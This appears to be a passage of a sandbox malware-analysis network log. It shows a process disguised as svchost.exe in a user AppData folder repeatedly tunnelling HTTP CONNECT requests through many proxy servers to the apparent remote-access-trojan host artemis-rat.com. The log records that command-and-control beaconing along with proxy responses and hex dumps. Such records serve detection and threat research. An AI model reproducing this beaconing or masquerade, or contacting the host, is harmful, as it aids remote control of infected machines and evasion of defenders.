                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.124953032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.870856047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880501986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880572081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.677537918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1911192.168.2.555909132.148.16.1691132043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.125097036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.583076000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1912192.168.2.55582324.249.199.12414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.132450104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1913192.168.2.55612143.157.44.7944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.134566069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1914192.168.2.55610293.190.24.11944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.134758949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1915192.168.2.55612593.190.24.11944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.135327101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1916192.168.2.55573065.1.40.47108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.135329008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.520915985 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1917192.168.2.55612693.190.24.11944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.136859894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1918192.168.2.55612793.190.24.11944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.138068914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1919192.168.2.55612843.157.44.7944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.141005993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1920192.168.2.55613243.157.44.7944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.141664028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1921192.168.2.55613443.157.44.7944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.142384052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1922192.168.2.555928104.25.115.1258043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.142682076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.297307014 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1923192.168.2.555760222.223.103.232730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.147018909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.500946999 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1924192.168.2.55614243.157.50.20644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.150664091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1925192.168.2.555936172.67.182.1508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.150746107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.305038929 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1926192.168.2.555950104.24.136.688043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.159921885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.314860106 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1927192.168.2.555964185.162.229.1278043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.167937040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.322302103 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1928192.168.2.55615043.157.50.20644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.170172930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1929192.168.2.555982185.238.228.2408043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.191651106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.346004963 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1930192.168.2.555992172.67.36.218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.191730022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.346163034 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1931192.168.2.55583046.105.42.230312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.193963051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.870918989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880501986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880582094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.614147902 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1932192.168.2.556004104.25.184.1898043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.194185019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.348510981 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1933192.168.2.55537642.61.48.219800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.194215059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.033819914 CET263INHTTP/1.1 503 Service Unavailable
                                                                                    x-envoy-overloaded: true
                                                                                    content-length: 81
                                                                                    content-type: text/plain
                                                                                    date: Sat, 09 Mar 2024 11:54:17 GMT
                                                                                    server: svcproxy
                                                                                    connection: close
                                                                                    Data Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77
                                                                                    Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1934192.168.2.555812190.128.228.1828043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.195652962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.557121038 CET1286INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Set-Cookie: PHPSESSID=i8njl4ga2eb9m6v146dumronka; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Length: 5101
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 